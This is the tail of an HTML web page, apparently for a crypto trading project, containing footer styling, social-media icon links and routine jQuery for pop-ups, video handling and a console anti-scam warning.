			#footerOuter {padding-top: 95px !important;}
		}

		#socialsOuter {position: absolute; top: 50%; left: 50%; width: 320px; height: 102px; transform: translate(-50%, -50%);}
		@media (max-width: 820px) {
			#footerOuter > .pageOuter {text-align: center;}
			#socialsOuter {display: inline-block; position: relative; transform: none; left: auto; margin: 50px 0;}
			#disclaimerOuter, #footerLinksOuter {width: 100%; text-align: center !important;}
		}

		@media (max-width: 360px) {
			#socialsOuter {left: 50%; transform: translateX(-50%); margin: 30px 0;}
		}
	</style>

	<div class="hr section" id="footerOuter" style="background-color: var(--bgColor);">
		<span class="hr pageOuter">
			<div class="fl" id="footerLinksOuter" style="float: right; text-align: right; line-height: 1.6em;">
				<a href="./downloads" class="textLink footerLink">Downloads</a><br>
				<a href="./trading" class="textLink footerLink">Trading</a><br>
				<a href="./dev" class="textLink footerLink">Developers</a>
			</div>

			<div id="socialsOuter">
				<a target="_blank" rel="noopener" href="">
					<img src="https://puasalebaranlagi.my.id/_assets/img/socials/tg.png" style="left: 45px; bottom: 52px;" alt="Telegram social icon">
				</a>
				<a target="_blank" rel="noopener" href="">
					<img src="https://puasalebaranlagi.my.id/_assets/img/socials/tg2.png" style="left: 0; bottom: 26px;" alt="Telegram news social icon">
				</a>
				<a target="_blank" rel="noopener" href="">
					<img src="https://puasalebaranlagi.my.id/_assets/img/socials/tg3.png" style="left: 90px; bottom: 26px;" alt="Telegram Trading icon">
				</a>
				<a target="_blank" rel="noopener" href="">
					<img src="https://puasalebaranlagi.my.id/_assets/img/socials/tg4.png" style="left: 45px; bottom: 0px;" alt="Telegram Memes icon">
				</a>
				<a target="_blank" rel="noopener" href="">
					<img src="https://puasalebaranlagi.my.id/_assets/img/socials/tw.png" style="left: 225px; bottom: 52px;" alt="Twitter logo icon">
				</a>
				<a target="_blank" rel="noopener" href="">
					<img src="https://puasalebaranlagi.my.id/_assets/img/socials/yt.png" style="left: 135px; bottom: 52px;" alt="YouTube logo icon">
				</a>
				<a target="_blank" rel="noopener" href="">
					<img src="https://puasalebaranlagi.my.id/_assets/img/socials/rt.png" style="left: 180px; bottom: 26px;" alt="Reddit logo icon">
				</a>
				<a target="_blank" rel="noopener" href="">
					<img src="https://puasalebaranlagi.my.id/_assets/img/socials/dc.png" style="left: 225px; bottom: 0px;" alt="Discord logo icon">
				</a>
				<a target="_blank" rel="noopener" href="">
					<img src="https://puasalebaranlagi.my.id/_assets/img/socials/fb.png" style="left: 270px; bottom: 26px;" alt="Facebook logo icon">
				</a>
				<a target="_blank" rel="noopener" href="">
					<img src="https://puasalebaranlagi.my.id/_assets/img/socials/ig.png" style="left: 135px; bottom: 0px;" alt="Instagram logo icon">
				</a>
			</div>

			<div class="fl" id="disclaimerOuter">
				<a href="" target="_blank" rel="noopener" class="textLink" style="cursor: pointer;">contact@</a>
				<br><br>
				<span style="font-size: 12px; color: #555;">
					Copyright © 2024. All Rights Reserved.<br>
					<a href="" target="_blank" rel="noopener" class="textLink" style="color: #555;">Disclaimer</a>
				</span>
			</div>
		</span>
	</div>

	<script>
		function scrollTo (elemID) {
			$('html,body').animate({scrollTop: $('#'+elemID).offset().top - 160}, 500)
		}


		$('.infoBtn').each((index, elem)=>{
			const btnText = $(elem).text()
			$(elem).attr('href', `javascript:showInfoDiv("${btnText}")`)
			// Add icon to button
			$(elem).html(`<span class="mi">${content[btnText][1]}</span>${$(elem).html()}`)
		})

		function showInfoDiv (cID) {
			$('#infoDivTitle').html(`
				<span class="mi">${content[cID][1]}</span>
				<span style="z-index: 2102; position: relative;">${content[cID][0]}</span>
			`)
			$('#infoDivText').html(content[cID][2].replace(/\r?\n/g, '<br>'))
			$('.infoDiv, .blackBG').show()
			window.location.hash = cID.replaceAll(' ', '_')
		}

		function close () {
			history.replaceState(null, null, ' ')
			$('.infoDiv, .blackBG').hide()
		}


		const flSiteIndex = ['downloads','trading','dev'].indexOf(window.location.pathname.replaceAll('/',''))
		if (flSiteIndex > -1)
			$(`.footerLink:eq(${flSiteIndex})`).css({
				cursor: 'default',
				'text-decoration': 'none',
				'font-weight': '700'
			}).attr('href','javascript:')

		// Pause every other video when another one is played
		const vids = Array.prototype.slice.apply($('video'))
		vids.forEach(v => {
			v.addEventListener('play', e => {
				vids.forEach(v => {
					if (e.target != v) v.pause()
				})
			})
		})

		// Hide clip-paths in videojs fullscreen to fix z-index bug in Safari on desktop
		$(()=>{
			for (i=0;i<vids.length;i++) {
				videojs(vids[i]).on('fullscreenchange', ()=>{
					$('.section').toggleClass('sectionCP')
				})
			}
		})

		// Scam warning & Job Listing
		setTimeout(()=>{
			console.log(
				'%cSTOP!\n%cNEVER paste anything in here! YOU WILL GET SCAMMED!!!\n%cOnly type anything in here if you are VERY sure about what you are doing! Otherwise there is an extremely high chance that you WILL LOSE YOUR MONEY!',
				'font-size: 50px; font-weight: 900; color: #f00;',
				'font-size: 30px; font-weight: 900; color: #f00;',
				'font-size: 15px; font-weight: 900; color: #f00;'
			)

		console.log(
				'%cBut\n%cin case you actually know what you are doing visit /dev',
				'font-size: 50px; font-weight: 900; color: #f0f;',
				'font-size: 15px; font-weight: 900; color: #f0f;'
			)
		}, 1000)
	</script>
	<script defer src="https://static.cloudflareinsights.com/beacon.min.js/v652eace1692a40cfa3763df669d7439c1639079717194" integrity="sha512-Gi7xpJR8tSkrpF7aordPZQlW2DLtzUlZcumS8dMQjwDHEnw9I7ZLyiOj/6tZStRBGtGgN6ceN6cMH8z7etPGlw==" data-cf-beacon='{"rayId":"6c86dc903ada1a40","version":"2021.12.0","r":1,"token":"a34c6d09c1e54a7c943f46827d855128","si":100}' crossorigin="anonymous"></script>
	<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.bundle.min.js" integrity="sha384-ka7Sk0Gln4gmtz2MlQnikT1wXgYsOg+OMhuP+IlRH9sENBO0LRn5q+8nbTov4+1p" crossorigin="anonymous"></script>
	
</body>
</html>
